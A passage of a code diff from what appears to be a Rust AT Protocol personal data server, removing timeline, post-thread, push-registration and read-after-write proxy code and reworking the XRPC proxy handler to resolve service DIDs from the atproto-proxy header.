if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
crate::auth::validate_bearer_token(&state.db, &token)
.await
.ok()
} else {
None
}
} else {
None
};
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
let mut query_params = HashMap::new();
query_params.insert("uri".to_string(), params.uri.clone());
if let Some(depth) = params.depth {
query_params.insert("depth".to_string(), depth.to_string());
}
if let Some(parent_height) = params.parent_height {
query_params.insert("parentHeight".to_string(), parent_height.to_string());
}
let proxy_result = match proxy_to_appview_via_registry(
&state,
"app.bsky.feed.getPostThread",
&query_params,
auth_did.as_deref().unwrap_or(""),
auth_key_bytes.as_deref(),
)
.await
{
Ok(r) => r,
Err(e) => return e,
};
if proxy_result.status == StatusCode::NOT_FOUND {
return handle_not_found(&state, &params.uri, auth_did, &proxy_result.headers).await;
}
if !proxy_result.status.is_success() {
return proxy_result.into_response();
}
let rev = match extract_repo_rev(&proxy_result.headers) {
Some(r) => r,
None => return proxy_result.into_response(),
};
let mut thread_output: PostThreadOutput = match serde_json::from_slice(&proxy_result.body) {
Ok(t) => t,
Err(e) => {
warn!("Failed to parse post thread response: {:?}", e);
return proxy_result.into_response();
}
};
let requester_did = match auth_did {
Some(d) => d,
None => return (StatusCode::OK, Json(thread_output)).into_response(),
};
let local_records = match get_records_since_rev(&state, &requester_did, &rev).await {
Ok(r) => r,
Err(e) => {
warn!("Failed to get local records: {}", e);
return proxy_result.into_response();
}
};
if local_records.posts.is_empty() {
return (StatusCode::OK, Json(thread_output)).into_response();
}
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did)
.fetch_optional(&state.db)
.await
{
Ok(Some(h)) => h,
Ok(None) => requester_did.clone(),
Err(e) => {
warn!("Database error fetching handle: {:?}", e);
requester_did.clone()
}
};
if let ThreadNode::Post(ref mut thread_post) = thread_output.thread {
add_replies_to_thread(
thread_post,
&local_records.posts,
&requester_did,
&handle,
0,
);
}
let lag = get_local_lag(&local_records);
format_munged_response(thread_output, lag)
}
async fn handle_not_found(
state: &AppState,
uri: &str,
auth_did: Option<String>,
headers: &axum::http::HeaderMap,
) -> Response {
let rev = match extract_repo_rev(headers) {
Some(r) => r,
None => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "NotFound", "message": "Post not found"})),
)
.into_response();
}
};
let requester_did = match auth_did {
Some(d) => d,
None => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "NotFound", "message": "Post not found"})),
)
.into_response();
}
};
let uri_parts: Vec<&str> = uri.trim_start_matches("at://").split('/').collect();
if uri_parts.len() != 3 {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "NotFound", "message": "Post not found"})),
)
.into_response();
}
let post_did = uri_parts[0];
if post_did != requester_did {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "NotFound", "message": "Post not found"})),
)
.into_response();
}
let local_records = match get_records_since_rev(state, &requester_did, &rev).await {
Ok(r) => r,
Err(_) => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "NotFound", "message": "Post not found"})),
)
.into_response();
}
};
let local_post = local_records.posts.iter().find(|p| p.uri == uri);
let local_post = match local_post {
Some(p) => p,
None => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "NotFound", "message": "Post not found"})),
)
.into_response();
}
};
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did)
.fetch_optional(&state.db)
.await
{
Ok(Some(h)) => h,
Ok(None) => requester_did.clone(),
Err(e) => {
warn!("Database error fetching handle: {:?}", e);
requester_did.clone()
}
};
let post_view = format_local_post(
local_post,
&requester_did,
&handle,
local_records.profile.as_ref(),
);
let thread = PostThreadOutput {
thread: ThreadNode::Post(Box::new(ThreadViewPost {
thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()),
post: post_view,
parent: None,
replies: None,
extra: HashMap::new(),
})),
threadgate: None,
};
let lag = get_local_lag(&local_records);
format_munged_response(thread, lag)
}

View File

@@ -1,275 +0,0 @@
use crate::api::read_after_write::{
FeedOutput, FeedViewPost, PostView, extract_repo_rev, format_local_post,
format_munged_response, get_local_lag, get_records_since_rev, insert_posts_into_feed,
proxy_to_appview_via_registry,
};
use crate::state::AppState;
use axum::{
Json,
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use jacquard_repo::storage::BlockStore;
use serde::Deserialize;
use serde_json::{Value, json};
use std::collections::HashMap;
use tracing::warn;
#[derive(Deserialize)]
pub struct GetTimelineParams {
pub algorithm: Option<String>,
pub limit: Option<u32>,
pub cursor: Option<String>,
}
pub async fn get_timeline(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
Query(params): Query<GetTimelineParams>,
) -> Response {
let token = match crate::auth::extract_bearer_token_from_header(
headers.get("Authorization").and_then(|h| h.to_str().ok()),
) {
Some(t) => t,
None => {
return (
StatusCode::UNAUTHORIZED,
Json(json!({"error": "AuthenticationRequired"})),
)
.into_response();
}
};
let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await {
Ok(user) => user,
Err(_) => {
return (
StatusCode::UNAUTHORIZED,
Json(json!({"error": "AuthenticationFailed"})),
)
.into_response();
}
};
if state.appview_registry.get_appview_for_method("app.bsky.feed.getTimeline").await.is_some() {
return get_timeline_with_appview(
&state,
&params,
&auth_user.did,
auth_user.key_bytes.as_deref(),
)
.await;
}
get_timeline_local_only(&state, &auth_user.did).await
}
async fn get_timeline_with_appview(
state: &AppState,
params: &GetTimelineParams,
auth_did: &str,
auth_key_bytes: Option<&[u8]>,
) -> Response {
let mut query_params = HashMap::new();
if let Some(algo) = &params.algorithm {
query_params.insert("algorithm".to_string(), algo.clone());
}
if let Some(limit) = params.limit {
query_params.insert("limit".to_string(), limit.to_string());
}
if let Some(cursor) = &params.cursor {
query_params.insert("cursor".to_string(), cursor.clone());
}
let proxy_result = match proxy_to_appview_via_registry(
state,
"app.bsky.feed.getTimeline",
&query_params,
auth_did,
auth_key_bytes,
)
.await
{
Ok(r) => r,
Err(e) => return e,
};
if !proxy_result.status.is_success() {
return proxy_result.into_response();
}
let rev = extract_repo_rev(&proxy_result.headers);
if rev.is_none() {
return proxy_result.into_response();
}
let rev = rev.unwrap();
let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) {
Ok(f) => f,
Err(e) => {
warn!("Failed to parse timeline response: {:?}", e);
return proxy_result.into_response();
}
};
let local_records = match get_records_since_rev(state, auth_did, &rev).await {
Ok(r) => r,
Err(e) => {
warn!("Failed to get local records: {}", e);
return proxy_result.into_response();
}
};
if local_records.count == 0 {
return proxy_result.into_response();
}
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", auth_did)
.fetch_optional(&state.db)
.await
{
Ok(Some(h)) => h,
Ok(None) => auth_did.to_string(),
Err(e) => {
warn!("Database error fetching handle: {:?}", e);
auth_did.to_string()
}
};
let local_posts: Vec<_> = local_records
.posts
.iter()
.map(|p| format_local_post(p, auth_did, &handle, local_records.profile.as_ref()))
.collect();
insert_posts_into_feed(&mut feed_output.feed, local_posts);
let lag = get_local_lag(&local_records);
format_munged_response(feed_output, lag)
}
async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response {
let user_id: uuid::Uuid =
match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", auth_did)
.fetch_optional(&state.db)
.await
{
Ok(Some(id)) => id,
Ok(None) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError", "message": "User not found"})),
)
.into_response();
}
Err(e) => {
warn!("Database error fetching user: {:?}", e);
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError", "message": "Database error"})),
)
.into_response();
}
};
let follows_query = sqlx::query!(
"SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.graph.follow' LIMIT 5000",
user_id
)
.fetch_all(&state.db)
.await;
let follow_cids: Vec<String> = match follows_query {
Ok(rows) => rows.iter().map(|r| r.record_cid.clone()).collect(),
Err(_) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),
)
.into_response();
}
};
let mut followed_dids: Vec<String> = Vec::new();
for cid_str in follow_cids {
let cid = match cid_str.parse::<cid::Cid>() {
Ok(c) => c,
Err(_) => continue,
};
let block_bytes = match state.block_store.get(&cid).await {
Ok(Some(b)) => b,
_ => continue,
};
let record: Value = match serde_ipld_dagcbor::from_slice(&block_bytes) {
Ok(v) => v,
Err(_) => continue,
};
if let Some(subject) = record.get("subject").and_then(|s| s.as_str()) {
followed_dids.push(subject.to_string());
}
}
if followed_dids.is_empty() {
return (
StatusCode::OK,
Json(FeedOutput {
feed: vec![],
cursor: None,
}),
)
.into_response();
}
let posts_result = sqlx::query!(
"SELECT r.record_cid, r.rkey, r.created_at, u.did, u.handle
FROM records r
JOIN repos rp ON r.repo_id = rp.user_id
JOIN users u ON rp.user_id = u.id
WHERE u.did = ANY($1) AND r.collection = 'app.bsky.feed.post'
ORDER BY r.created_at DESC
LIMIT 50",
&followed_dids
)
.fetch_all(&state.db)
.await;
let posts = match posts_result {
Ok(rows) => rows,
Err(_) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),
)
.into_response();
}
};
let mut feed: Vec<FeedViewPost> = Vec::new();
for row in posts {
let record_cid: String = row.record_cid;
let rkey: String = row.rkey;
let created_at: chrono::DateTime<chrono::Utc> = row.created_at;
let author_did: String = row.did;
let author_handle: String = row.handle;
let cid = match record_cid.parse::<cid::Cid>() {
Ok(c) => c,
Err(_) => continue,
};
let block_bytes = match state.block_store.get(&cid).await {
Ok(Some(b)) => b,
_ => continue,
};
let record: Value = match serde_ipld_dagcbor::from_slice(&block_bytes) {
Ok(v) => v,
Err(_) => continue,
};
let uri = format!("at://{}/app.bsky.feed.post/{}", author_did, rkey);
feed.push(FeedViewPost {
post: PostView {
uri,
cid: record_cid,
author: crate::api::read_after_write::AuthorView {
did: author_did,
handle: author_handle,
display_name: None,
avatar: None,
extra: HashMap::new(),
},
record,
indexed_at: created_at.to_rfc3339(),
embed: None,
reply_count: 0,
repost_count: 0,
like_count: 0,
quote_count: 0,
extra: HashMap::new(),
},
reply: None,
reason: None,
feed_context: None,
extra: HashMap::new(),
});
}
(StatusCode::OK, Json(FeedOutput { feed, cursor: None })).into_response()
}

View File

@@ -1,14 +1,11 @@
pub mod actor;
pub mod admin;
pub mod error;
pub mod feed;
pub mod identity;
pub mod moderation;
pub mod notification;
pub mod notification_prefs;
pub mod proxy;
pub mod proxy_client;
pub mod read_after_write;
pub mod repo;
pub mod server;
pub mod temp;

View File

@@ -1,3 +0,0 @@
mod register_push;
pub use register_push::register_push;

View File

@@ -1,153 +0,0 @@
use crate::api::ApiError;
use crate::api::proxy_client::{is_ssrf_safe, proxy_client, validate_did};
use crate::state::AppState;
use axum::{
Json,
extract::State,
http::{HeaderMap, StatusCode},
response::{IntoResponse, Response},
};
use serde::Deserialize;
use serde_json::json;
use tracing::{error, info};
#[derive(Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct RegisterPushInput {
pub service_did: String,
pub token: String,
pub platform: String,
pub app_id: String,
}
const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"];
pub async fn register_push(
State(state): State<AppState>,
headers: HeaderMap,
Json(input): Json<RegisterPushInput>,
) -> Response {
let token = match crate::auth::extract_bearer_token_from_header(
headers.get("Authorization").and_then(|h| h.to_str().ok()),
) {
Some(t) => t,
None => return ApiError::AuthenticationRequired.into_response(),
};
let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await {
Ok(user) => user,
Err(e) => return ApiError::from(e).into_response(),
};
if let Err(e) = validate_did(&input.service_did) {
return ApiError::InvalidRequest(format!("Invalid serviceDid: {}", e)).into_response();
}
if input.token.is_empty() || input.token.len() > 4096 {
return ApiError::InvalidRequest("Invalid push token".to_string()).into_response();
}
if !VALID_PLATFORMS.contains(&input.platform.as_str()) {
return ApiError::InvalidRequest(format!(
"Invalid platform. Must be one of: {}",
VALID_PLATFORMS.join(", ")
))
.into_response();
}
if input.app_id.is_empty() || input.app_id.len() > 256 {
return ApiError::InvalidRequest("Invalid appId".to_string()).into_response();
}
let resolved = match state.appview_registry.get_appview_for_method("app.bsky.notification.registerPush").await {
Some(r) => r,
None => {
return ApiError::UpstreamUnavailable("No upstream AppView configured for app.bsky.notification.registerPush".to_string())
.into_response();
}
};
if let Err(e) = is_ssrf_safe(&resolved.url) {
error!("SSRF check failed for appview URL: {}", e);
return ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e))
.into_response();
}
let key_row = match sqlx::query!(
"SELECT key_bytes, encryption_version FROM user_keys k JOIN users u ON k.user_id = u.id WHERE u.did = $1",
auth_user.did
)
.fetch_optional(&state.db)
.await
{
Ok(Some(row)) => row,
Ok(None) => {
error!(did = %auth_user.did, "No signing key found for user");
return ApiError::InternalError.into_response();
}
Err(e) => {
error!(error = ?e, "Database error fetching signing key");
return ApiError::DatabaseError.into_response();
}
};
let decrypted_key =
match crate::config::decrypt_key(&key_row.key_bytes, key_row.encryption_version) {
Ok(k) => k,
Err(e) => {
error!(error = ?e, "Failed to decrypt signing key");
return ApiError::InternalError.into_response();
}
};
let service_token = match crate::auth::create_service_token(
&auth_user.did,
&input.service_did,
"app.bsky.notification.registerPush",
&decrypted_key,
) {
Ok(t) => t,
Err(e) => {
error!(error = ?e, "Failed to create service token");
return ApiError::InternalError.into_response();
}
};
let target_url = format!("{}/xrpc/app.bsky.notification.registerPush", resolved.url);
info!(
target = %target_url,
service_did = %input.service_did,
platform = %input.platform,
"Proxying registerPush request"
);
let client = proxy_client();
let request_body = json!({
"serviceDid": input.service_did,
"token": input.token,
"platform": input.platform,
"appId": input.app_id
});
match client
.post(&target_url)
.header("Authorization", format!("Bearer {}", service_token))
.header("Content-Type", "application/json")
.json(&request_body)
.send()
.await
{
Ok(resp) => {
let status =
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
if status.is_success() {
StatusCode::OK.into_response()
} else {
let body = resp.bytes().await.unwrap_or_default();
error!(
status = %status,
"registerPush upstream error"
);
ApiError::from_upstream_response(status.as_u16(), &body).into_response()
}
}
Err(e) => {
error!(error = ?e, "Error proxying registerPush");
if e.is_timeout() {
ApiError::UpstreamTimeout.into_response()
} else if e.is_connect() {
ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
.into_response()
} else {
ApiError::UpstreamFailure.into_response()
}
}
}
}

View File

@@ -1,11 +1,13 @@
use crate::api::proxy_client::proxy_client;
use crate::state::AppState;
use axum::{
Json,
body::Bytes,
extract::{Path, RawQuery, State},
http::{HeaderMap, Method, StatusCode},
response::{IntoResponse, Response},
};
use serde_json::json;
use tracing::{error, info, warn};
pub async fn proxy_handler(
@@ -16,65 +18,80 @@ pub async fn proxy_handler(
RawQuery(query): RawQuery,
body: Bytes,
) -> Response {
let proxy_header = headers
let proxy_header = match headers
.get("atproto-proxy")
.and_then(|h| h.to_str().ok())
.map(|s| s.to_string());
let (appview_url, service_aud) = match &proxy_header {
Some(did_str) => {
let did_without_fragment = did_str.split('#').next().unwrap_or(did_str).to_string();
match state.appview_registry.resolve_appview_did(&did_without_fragment).await {
Some(resolved) => (resolved.url, Some(resolved.did)),
None => {
error!(did = %did_str, "Could not resolve service DID");
return (StatusCode::BAD_GATEWAY, "Could not resolve service DID")
.into_response();
}
}
}
{
Some(h) => h.to_string(),
None => {
match state.appview_registry.get_appview_for_method(&method).await {
Some(resolved) => (resolved.url, Some(resolved.did)),
None => {
return (StatusCode::BAD_GATEWAY, "No upstream AppView configured for this method")
.into_response();
}
}
return (
StatusCode::BAD_REQUEST,
Json(json!({
"error": "InvalidRequest",
"message": "Missing required atproto-proxy header"
})),
)
.into_response();
}
};
let did = proxy_header.split('#').next().unwrap_or(&proxy_header);
let resolved = match state.did_resolver.resolve_did(did).await {
Some(r) => r,
None => {
error!(did = %did, "Could not resolve service DID");
return (
StatusCode::BAD_GATEWAY,
Json(json!({
"error": "UpstreamFailure",
"message": "Could not resolve service DID"
})),
)
.into_response();
}
};
let target_url = match &query {
Some(q) => format!("{}/xrpc/{}?{}", appview_url, method, q),
None => format!("{}/xrpc/{}", appview_url, method),
Some(q) => format!("{}/xrpc/{}?{}", resolved.url, method, q),
None => format!("{}/xrpc/{}", resolved.url, method),
};
info!("Proxying {} request to {}", method_verb, target_url);
let client = proxy_client();
let mut request_builder = client.request(method_verb, &target_url);
let mut auth_header_val = headers.get("Authorization").cloned();
if let Some(aud) = &service_aud {
if let Some(token) = crate::auth::extract_bearer_token_from_header(
headers.get("Authorization").and_then(|h| h.to_str().ok()),
) {
match crate::auth::validate_bearer_token(&state.db, &token).await {
Ok(auth_user) => {
if let Some(key_bytes) = auth_user.key_bytes {
match crate::auth::create_service_token(&auth_user.did, aud, &method, &key_bytes) {
Ok(new_token) => {
if let Ok(val) = axum::http::HeaderValue::from_str(&format!("Bearer {}", new_token)) {
auth_header_val = Some(val);
}
}
Err(e) => {
warn!("Failed to create service token: {:?}", e);
if let Some(token) = crate::auth::extract_bearer_token_from_header(
headers.get("Authorization").and_then(|h| h.to_str().ok()),
) {
match crate::auth::validate_bearer_token(&state.db, &token).await {
Ok(auth_user) => {
if let Some(key_bytes) = auth_user.key_bytes {
match crate::auth::create_service_token(
&auth_user.did,
&resolved.did,
&method,
&key_bytes,
) {
Ok(new_token) => {
if let Ok(val) =
axum::http::HeaderValue::from_str(&format!("Bearer {}", new_token))
{
auth_header_val = Some(val);
}
}
Err(e) => {
warn!("Failed to create service token: {:?}", e);
}
}
}
Err(e) => {
warn!("Token validation failed: {:?}", e);
}
}
Err(e) => {
warn!("Token validation failed: {:?}", e);
}
}
}
if let Some(val) = auth_header_val {
request_builder = request_builder.header("Authorization", val);
}
@@ -86,6 +103,7 @@ pub async fn proxy_handler(
if !body.is_empty() {
request_builder = request_builder.body(body);
}
match request_builder.send().await {
Ok(resp) => {
let status = resp.status();

View File

@@ -1,456 +0,0 @@
use crate::api::ApiError;
use crate::api::proxy_client::{
MAX_RESPONSE_SIZE, RESPONSE_HEADERS_TO_FORWARD, is_ssrf_safe, proxy_client,
};
use crate::state::AppState;
use axum::{
Json,
http::{HeaderMap, HeaderValue, StatusCode},
response::{IntoResponse, Response},
};
use bytes::Bytes;
use chrono::{DateTime, Utc};
use cid::Cid;
use jacquard_repo::storage::BlockStore;
use serde::{Deserialize, Serialize};
use serde_json::Value;
use std::collections::HashMap;
use tracing::{error, info, warn};
use uuid::Uuid;
pub const REPO_REV_HEADER: &str = "atproto-repo-rev";
pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag";
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct PostRecord {
#[serde(rename = "$type")]
pub record_type: Option<String>,
pub text: String,
pub created_at: String,
#[serde(skip_serializing_if = "Option::is_none")]
pub reply: Option<Value>,
#[serde(skip_serializing_if = "Option::is_none")]
pub embed: Option<Value>,
#[serde(skip_serializing_if = "Option::is_none")]
pub langs: Option<Vec<String>>,
#[serde(skip_serializing_if = "Option::is_none")]
pub labels: Option<Value>,
#[serde(skip_serializing_if = "Option::is_none")]
pub tags: Option<Vec<String>>,
#[serde(flatten)]
pub extra: HashMap<String, Value>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ProfileRecord {
#[serde(rename = "$type")]
pub record_type: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub display_name: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub description: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub avatar: Option<Value>,
#[serde(skip_serializing_if = "Option::is_none")]
pub banner: Option<Value>,
#[serde(flatten)]
pub extra: HashMap<String, Value>,
}
#[derive(Debug, Clone)]
pub struct RecordDescript<T> {
pub uri: String,
pub cid: String,
pub indexed_at: DateTime<Utc>,
pub record: T,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct LikeRecord {
#[serde(rename = "$type")]
pub record_type: Option<String>,
pub subject: LikeSubject,
pub created_at: String,
#[serde(flatten)]
pub extra: HashMap<String, Value>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct LikeSubject {
pub uri: String,
pub cid: String,
}
#[derive(Debug, Default)]
pub struct LocalRecords {
pub count: usize,
pub profile: Option<RecordDescript<ProfileRecord>>,
pub posts: Vec<RecordDescript<PostRecord>>,
pub likes: Vec<RecordDescript<LikeRecord>>,
}
pub async fn get_records_since_rev(
state: &AppState,
did: &str,
rev: &str,
) -> Result<LocalRecords, String> {
let mut result = LocalRecords::default();
let user_id: Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
.fetch_optional(&state.db)
.await
.map_err(|e| format!("DB error: {}", e))?
.ok_or_else(|| "User not found".to_string())?;
let rows = sqlx::query!(
r#"
SELECT record_cid, collection, rkey, created_at, repo_rev
FROM records
WHERE repo_id = $1 AND repo_rev > $2
ORDER BY repo_rev ASC
LIMIT 10
"#,
user_id,
rev
)
.fetch_all(&state.db)
.await
.map_err(|e| format!("DB error fetching records: {}", e))?;
if rows.is_empty() {
return Ok(result);
}
let sanity_check = sqlx::query_scalar!(
"SELECT 1 as val FROM records WHERE repo_id = $1 AND repo_rev <= $2 LIMIT 1",
user_id,
rev
)
.fetch_optional(&state.db)
.await
.map_err(|e| format!("DB error sanity check: {}", e))?;
if sanity_check.is_none() {
warn!("Sanity check failed: no records found before rev {}", rev);
return Ok(result);
}
struct RowData {
cid_str: String,
collection: String,
rkey: String,
created_at: DateTime<Utc>,
}
let mut row_data: Vec<RowData> = Vec::with_capacity(rows.len());
let mut cids: Vec<Cid> = Vec::with_capacity(rows.len());
for row in &rows {
if let Ok(cid) = row.record_cid.parse::<Cid>() {
cids.push(cid);
row_data.push(RowData {
cid_str: row.record_cid.clone(),
collection: row.collection.clone(),
rkey: row.rkey.clone(),
created_at: row.created_at,
});
}
}
let blocks: Vec<Option<Bytes>> = state
.block_store
.get_many(&cids)
.await
.map_err(|e| format!("Error fetching blocks: {}", e))?;
for (data, block_opt) in row_data.into_iter().zip(blocks.into_iter()) {
let block_bytes = match block_opt {
Some(b) => b,
None => continue,
};
result.count += 1;
let uri = format!("at://{}/{}/{}", did, data.collection, data.rkey);
if data.collection == "app.bsky.actor.profile" && data.rkey == "self" {
if let Ok(record) = serde_ipld_dagcbor::from_slice::<ProfileRecord>(&block_bytes) {
result.profile = Some(RecordDescript {
uri,
cid: data.cid_str,
indexed_at: data.created_at,
record,
});
}
} else if data.collection == "app.bsky.feed.post" {
if let Ok(record) = serde_ipld_dagcbor::from_slice::<PostRecord>(&block_bytes) {
result.posts.push(RecordDescript {
uri,
cid: data.cid_str,
indexed_at: data.created_at,
record,
});
}
} else if data.collection == "app.bsky.feed.like"
&& let Ok(record) = serde_ipld_dagcbor::from_slice::<LikeRecord>(&block_bytes) {
result.likes.push(RecordDescript {
uri,
cid: data.cid_str,
indexed_at: data.created_at,
record,
});
}
}
Ok(result)
}
pub fn get_local_lag(local: &LocalRecords) -> Option<i64> {
let mut oldest: Option<DateTime<Utc>> = local.profile.as_ref().map(|p| p.indexed_at);
for post in &local.posts {
match oldest {
None => oldest = Some(post.indexed_at),
Some(o) if post.indexed_at < o => oldest = Some(post.indexed_at),
_ => {}
}
}
for like in &local.likes {
match oldest {
None => oldest = Some(like.indexed_at),
Some(o) if like.indexed_at < o => oldest = Some(like.indexed_at),
_ => {}
}
}
oldest.map(|o| (Utc::now() - o).num_milliseconds())
}
pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> {
headers
.get(REPO_REV_HEADER)
.and_then(|h| h.to_str().ok())
.map(|s| s.to_string())
}
#[derive(Debug)]
pub struct ProxyResponse {
pub status: StatusCode,
pub headers: HeaderMap,
pub body: bytes::Bytes,
}
impl ProxyResponse {
pub fn into_response(self) -> Response {
let mut response = Response::builder().status(self.status);
for (key, value) in self.headers.iter() {
response = response.header(key, value);
}
response.body(axum::body::Body::from(self.body)).unwrap()
}
}
pub async fn proxy_to_appview_via_registry(
state: &AppState,
method: &str,
params: &HashMap<String, String>,
auth_did: &str,
auth_key_bytes: Option<&[u8]>,
) -> Result<ProxyResponse, Response> {
let resolved = state.appview_registry.get_appview_for_method(method).await.ok_or_else(|| {
ApiError::UpstreamUnavailable(format!("No AppView configured for method: {}", method)).into_response()
})?;
proxy_to_appview_with_url(method, params, auth_did, auth_key_bytes, &resolved.url, &resolved.did).await
}
pub async fn proxy_to_appview_with_url(
method: &str,
params: &HashMap<String, String>,
auth_did: &str,
auth_key_bytes: Option<&[u8]>,
appview_url: &str,
appview_did: &str,
) -> Result<ProxyResponse, Response> {
if let Err(e) = is_ssrf_safe(appview_url) {
error!("SSRF check failed for appview URL: {}", e);
return Err(
ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e)).into_response(),
);
}
let target_url = format!("{}/xrpc/{}", appview_url, method);
info!(target = %target_url, "Proxying request to appview");
let client = proxy_client();
let mut request_builder = client.get(&target_url).query(params);
if let Some(key_bytes) = auth_key_bytes {
match crate::auth::create_service_token(auth_did, appview_did, method, key_bytes) {
Ok(service_token) => {
request_builder =
request_builder.header("Authorization", format!("Bearer {}", service_token));
}
Err(e) => {
error!(error = ?e, "Failed to create service token");
return Err(ApiError::InternalError.into_response());
}
}
}
match request_builder.send().await {
Ok(resp) => {
let status =
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
let headers: HeaderMap = resp
.headers()
.iter()
.filter(|(k, _)| {
RESPONSE_HEADERS_TO_FORWARD
.iter()
.any(|h| k.as_str().eq_ignore_ascii_case(h))
})
.filter_map(|(k, v)| {
let name = axum::http::HeaderName::try_from(k.as_str()).ok()?;
let value = HeaderValue::from_bytes(v.as_bytes()).ok()?;
Some((name, value))
})
.collect();
let content_length = resp.content_length().unwrap_or(0);
if content_length > MAX_RESPONSE_SIZE {
error!(
content_length,
max = MAX_RESPONSE_SIZE,
"Upstream response too large"
);
return Err(ApiError::UpstreamFailure.into_response());
}
let body = resp.bytes().await.map_err(|e| {
error!(error = ?e, "Error reading proxy response body");
ApiError::UpstreamFailure.into_response()
})?;
if body.len() as u64 > MAX_RESPONSE_SIZE {
error!(
len = body.len(),
max = MAX_RESPONSE_SIZE,
"Upstream response body exceeded size limit"
);
return Err(ApiError::UpstreamFailure.into_response());
}
Ok(ProxyResponse {
status,
headers,
body,
})
}
Err(e) => {
error!(error = ?e, "Error sending proxy request");
if e.is_timeout() {
Err(ApiError::UpstreamTimeout.into_response())
} else if e.is_connect() {
Err(
ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
.into_response(),
)
} else {
Err(ApiError::UpstreamFailure.into_response())
}
}
}
}
pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response {
let mut response = (StatusCode::OK, Json(data)).into_response();
if let Some(lag_ms) = lag
&& let Ok(header_val) = HeaderValue::from_str(&lag_ms.to_string()) {
response
.headers_mut()
.insert(UPSTREAM_LAG_HEADER, header_val);
}
response
}
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct AuthorView {
pub did: String,
pub handle: String,
#[serde(skip_serializing_if = "Option::is_none")]
pub display_name: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub avatar: Option<String>,
#[serde(flatten)]
pub extra: HashMap<String, Value>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct PostView {
pub uri: String,
pub cid: String,
pub author: AuthorView,
pub record: Value,
pub indexed_at: String,
#[serde(skip_serializing_if = "Option::is_none")]
pub embed: Option<Value>,
#[serde(default)]
pub reply_count: i64,
#[serde(default)]
pub repost_count: i64,
#[serde(default)]
pub like_count: i64,
#[serde(default)]
pub quote_count: i64,
#[serde(flatten)]
pub extra: HashMap<String, Value>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct FeedViewPost {
pub post: PostView,
#[serde(skip_serializing_if = "Option::is_none")]
pub reply: Option<Value>,
#[serde(skip_serializing_if = "Option::is_none")]
pub reason: Option<Value>,
#[serde(skip_serializing_if = "Option::is_none")]
pub feed_context: Option<String>,
#[serde(flatten)]
pub extra: HashMap<String, Value>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct FeedOutput {
pub feed: Vec<FeedViewPost>,
#[serde(skip_serializing_if = "Option::is_none")]
pub cursor: Option<String>,
}
pub fn format_local_post(
descript: &RecordDescript<PostRecord>,
author_did: &str,
author_handle: &str,
profile: Option<&RecordDescript<ProfileRecord>>,
) -> PostView {
let display_name = profile.and_then(|p| p.record.display_name.clone());
PostView {
uri: descript.uri.clone(),
cid: descript.cid.clone(),
author: AuthorView {
did: author_did.to_string(),
handle: author_handle.to_string(),
display_name,
avatar: None,
extra: HashMap::new(),
},
record: serde_json::to_value(&descript.record).unwrap_or(Value::Null),
indexed_at: descript.indexed_at.to_rfc3339(),
embed: descript.record.embed.clone(),
reply_count: 0,
repost_count: 0,
like_count: 0,
quote_count: 0,
extra: HashMap::new(),
}
}
pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) {
if posts.is_empty() {
return;
}
let new_items: Vec<FeedViewPost> = posts
.into_iter()
.map(|post| FeedViewPost {
post,
reply: None,
reason: None,
feed_context: None,
extra: HashMap::new(),
})
.collect();
feed.extend(new_items);
